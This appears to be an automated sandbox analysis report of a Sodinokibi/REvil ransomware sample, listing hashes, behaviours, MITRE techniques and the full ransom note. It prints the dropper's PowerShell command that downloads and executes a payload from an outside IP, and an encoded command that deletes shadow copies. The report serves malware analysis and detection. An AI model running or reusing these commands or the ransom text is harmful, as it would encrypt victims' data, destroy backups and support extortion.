sodinokibi | 2205a70334b25bffd2fd640431ead8e205972aec23afb40445acc07551125122

General

Target

0a68667f99524ab8520068fdbbed1678.bat
Size

221B
MD5

cefe88b45a372f35cb4fffccfe53cbe0
SHA1

b3674eae09ae4b809ee9996ace3983b9a19a67b8
SHA256

2205a70334b25bffd2fd640431ead8e205972aec23afb40445acc07551125122
SHA512

e52d33a82535394ef297031ff5c51169c0859959c6b043f8f6ff33eb93cf5e0750f07060e8d36f3a47248ce9770a632313cc15544c3c2343c78d08701fcb23f0

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/0a68667f99524ab8520068fdbbed1678

Extracted

Path

C:\lu3p18it-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension lu3p18it. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/178BCB8E629819B6 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/178BCB8E629819B6 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: UW61ljj/j8aRgVB+mL+RD7YSc1qZz+s0gsXHoPJdns826+2awFA8//qy5XUSUJ7K hPgW/yV0mGjpCIQ1zh/WgeP+gz7wU9wlrfRP2aC0Kajnvlz46W9DYBDp61MsjIm3 gzPN38ouyJjHL0eZ/3ykLVdPIp6aGM/60piXijWYCJpM7sJMO8klxl4A+VtuOXjp QbHA80xeSkf1qTgj7swt1Jgb00L4lMLHxpdWy0983mq9mN9uma9/QxZVJd1XdScM akKOnL1wzgVbqaTLwKR3uzgDmSgwbxvxlOFfmiQ1ZHrtk6m0jBWu6f1fYQyBuqPU tmOPh/q0JPnu6+Chn4iVEboVQKPDJs5Yv3TxQKlNV2rWUfLpil27dbO8q0+5oFyC 6pI4J5GEMRIBfA+78IZHFzj9OLtlxBBQaJddYlghxewz2OsB+KCP1nh3tnVef0P7 XlGmwPEsHDl/nl0tqLWRjamnjR/7ZbmH7A/YZVR3l0M3tmICvpIXrIsT4h81bScH wN4wXxBTnpNY639Q9/WE6sJforj/Dsasg2YurYxJysedexVdzAgx+Ye5F0KenNT5 ZIuxzCzXoMaKuhyWlBx6EQ02zxDGjP2A9lLndnCkCFY1zzSa3KCqmVgZYiros2Hw Bj5HwmEV5hyiUviNWSQTMbiUZQBg6NKz6ehv0YWPXzAWpH+2h5UCjWngWOMRAnP/ 4usop1T2if8j3IuJumHZFfwRFFEhQ+7ZW6PO/AJrByVgXpGO9UWCHZPtNpyDGacF WdHHvJf0Cygj6iuNq4R2QhbKKaU7ZguJciV0DvKRCPDej1ox75p160Oy+ClxSxGt 4Sa2hLZxpfZFS5zBXLpF+FUEx+DnB0jgwW/QcWOYIiGjzYr7yJjBOAlofWZyaQG7 zjiQF2ntxuYD8RO+RaV+QwIwqvDU9bgPpTigXRC+6FLGEykCJlc8Fhn9YFP9Q1XK IU80i/Mk1clB36HBK8cVBU139WLgySpM18M5BnjRqnRdp4CGYZO/O7HLoWv+U3EM xQSZ0ihgH/0hwSbAvvUhNfJWAa4aqATAeXZIjfInsj1rHU4qb3VAG3tmYMEuweqS qa3ohC5zcr6JOMsbSgeH7RZW8BZ8xpGCbUjiDSVUaXT876EWWkCNc+VvSsVbnK5d I5Pz2MCngZRTV3DAQJjgq5YJ4BogupIzCtiT4P7HIViI41KO3hMVJ6rzrERl5A3I D3CVwJBCnBf4w/NltMHwqELBKmC/nQ/fGK+xkFoqKLPR30FUw2OCYZ9Lr0LrgXGb F93RyLoGlC2byDe8bb9UPRV6lixW6A5ojBTN5aszxYUx+4Gq ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/178BCB8E629819B6

http://decryptor.cc/178BCB8E629819B6

Signatures

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

824 powershell.exe

pid	process
824	powershell.exe

Blacklisted process makes network request 120 IoCs

Processes:

powershell.exe

flow	pid	process
3	824	powershell.exe
5	824	powershell.exe
7	824	powershell.exe
8	824	powershell.exe
10	824	powershell.exe
11	824	powershell.exe
13	824	powershell.exe
15	824	powershell.exe
16	824	powershell.exe
18	824	powershell.exe
20	824	powershell.exe
22	824	powershell.exe
23	824	powershell.exe
25	824	powershell.exe
27	824	powershell.exe
29	824	powershell.exe
31	824	powershell.exe
33	824	powershell.exe
34	824	powershell.exe
36	824	powershell.exe
37	824	powershell.exe
39	824	powershell.exe
41	824	powershell.exe
42	824	powershell.exe
44	824	powershell.exe
45	824	powershell.exe
47	824	powershell.exe
49	824	powershell.exe
50	824	powershell.exe
52	824	powershell.exe
54	824	powershell.exe
56	824	powershell.exe
59	824	powershell.exe
60	824	powershell.exe
62	824	powershell.exe
64	824	powershell.exe
65	824	powershell.exe
67	824	powershell.exe
69	824	powershell.exe
70	824	powershell.exe
72	824	powershell.exe
74	824	powershell.exe
75	824	powershell.exe
77	824	powershell.exe
78	824	powershell.exe
80	824	powershell.exe
81	824	powershell.exe
83	824	powershell.exe
85	824	powershell.exe
86	824	powershell.exe
88	824	powershell.exe
89	824	powershell.exe
91	824	powershell.exe
92	824	powershell.exe
94	824	powershell.exe
95	824	powershell.exe
97	824	powershell.exe
100	824	powershell.exe
102	824	powershell.exe
104	824	powershell.exe
107	824	powershell.exe
110	824	powershell.exe
112	824	powershell.exe
114	824	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\31kay9x2u5v72.bmp"	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Drops file in Program Files directory 24 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\AddPop.aifc	powershell.exe
File opened for modification	\??\c:\program files\CopyTest.mp4	powershell.exe
File opened for modification	\??\c:\program files\FormatSplit.sql	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\lu3p18it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\RequestDisable.vsdm	powershell.exe
File opened for modification	\??\c:\program files\SendPush.midi	powershell.exe
File created	\??\c:\program files (x86)\lu3p18it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ConvertUnpublish.pptm	powershell.exe
File opened for modification	\??\c:\program files\DisconnectWatch.mp3	powershell.exe
File opened for modification	\??\c:\program files\ExportSuspend.m3u	powershell.exe
File opened for modification	\??\c:\program files\LimitWrite.xltm	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\lu3p18it-readme.txt	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\lu3p18it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\GroupDisable.tif	powershell.exe
File opened for modification	\??\c:\program files\JoinInstall.ppsx	powershell.exe
File opened for modification	\??\c:\program files\MeasureUpdate.ppsx	powershell.exe
File opened for modification	\??\c:\program files\RemoveDisconnect.midi	powershell.exe
File opened for modification	\??\c:\program files\StopJoin.docx	powershell.exe
File opened for modification	\??\c:\program files\StepOptimize.temp	powershell.exe
File created	\??\c:\program files\lu3p18it-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\CompareMove.mp4v	powershell.exe
File opened for modification	\??\c:\program files\ConfirmMount.odp	powershell.exe
File opened for modification	\??\c:\program files\InvokeDismount.DVR-MS	powershell.exe
File opened for modification	\??\c:\program files\SelectResolve.docx	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1124 wrote to memory of 824	1124	cmd.exe	powershell.exe
PID 1124 wrote to memory of 824	1124	cmd.exe	powershell.exe
PID 1124 wrote to memory of 824	1124	cmd.exe	powershell.exe
PID 1124 wrote to memory of 824	1124	cmd.exe	powershell.exe
PID 824 wrote to memory of 1688	824	powershell.exe	powershell.exe
PID 824 wrote to memory of 1688	824	powershell.exe	powershell.exe
PID 824 wrote to memory of 1688	824	powershell.exe	powershell.exe
PID 824 wrote to memory of 1688	824	powershell.exe	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	824	powershell.exe
Token: SeDebugPrivilege	1688	powershell.exe
Token: SeBackupPrivilege	1640	vssvc.exe
Token: SeRestorePrivilege	1640	vssvc.exe
Token: SeAuditPrivilege	1640	vssvc.exe
Token: SeTakeOwnershipPrivilege	824	powershell.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

824 powershell.exe
824 powershell.exe
824 powershell.exe
1688 powershell.exe
1688 powershell.exe

pid	process
824	powershell.exe
824	powershell.exe
824	powershell.exe
1688	powershell.exe
1688	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d578112861900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a919000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c02000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e26040000000100000010000000324a4bbbc863699bbe749ac6dd1d46240f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e650030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000002000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	powershell.exe

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\pictures\SendSwitch.tiff	powershell.exe
File opened for modification	\??\c:\users\admin\pictures\WriteConvert.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\MoveInitialize.png => \??\c:\users\admin\pictures\MoveInitialize.png.lu3p18it	powershell.exe
File renamed	C:\Users\Admin\Pictures\DebugApprove.png => \??\c:\users\admin\pictures\DebugApprove.png.lu3p18it	powershell.exe
File renamed	C:\Users\Admin\Pictures\SendSwitch.tiff => \??\c:\users\admin\pictures\SendSwitch.tiff.lu3p18it	powershell.exe
File renamed	C:\Users\Admin\Pictures\WriteConvert.tiff => \??\c:\users\admin\pictures\WriteConvert.tiff.lu3p18it	powershell.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\0a68667f99524ab8520068fdbbed1678.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1124

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/0a68667f99524ab8520068fdbbed1678');Invoke-BRJMSJCEJYRPOF;Start-Sleep -s 10000"
2⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Modifies system certificate store
- Modifies extensions of user files
- Drops file in System32 directory
PID:824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1688

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1640

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/824-5-0x0000000002810000-0x0000000002811000-memory.dmp

Filesize
4KB

Download
memory/824-21-0x0000000005990000-0x0000000005991000-memory.dmp

Filesize
4KB

Download
memory/824-22-0x00000000063E0000-0x00000000063E1000-memory.dmp

Filesize
4KB

Download
memory/824-14-0x0000000006350000-0x0000000006351000-memory.dmp

Filesize
4KB

Download
memory/824-13-0x0000000005830000-0x0000000005831000-memory.dmp

Filesize
4KB

Download
memory/824-8-0x0000000005740000-0x0000000005741000-memory.dmp

Filesize
4KB

Download
memory/824-0-0x0000000000000000-mapping.dmp

Download
memory/824-4-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

Filesize
4KB

Download
memory/824-3-0x0000000004900000-0x0000000004901000-memory.dmp

Filesize
4KB

Download
memory/824-2-0x0000000000980000-0x0000000000981000-memory.dmp

Filesize
4KB

Download
memory/824-1-0x00000000741F0000-0x00000000748DE000-memory.dmp

Filesize
6.9MB

Download
memory/1688-23-0x0000000000000000-mapping.dmp

Download
memory/1688-25-0x00000000741F0000-0x00000000748DE000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads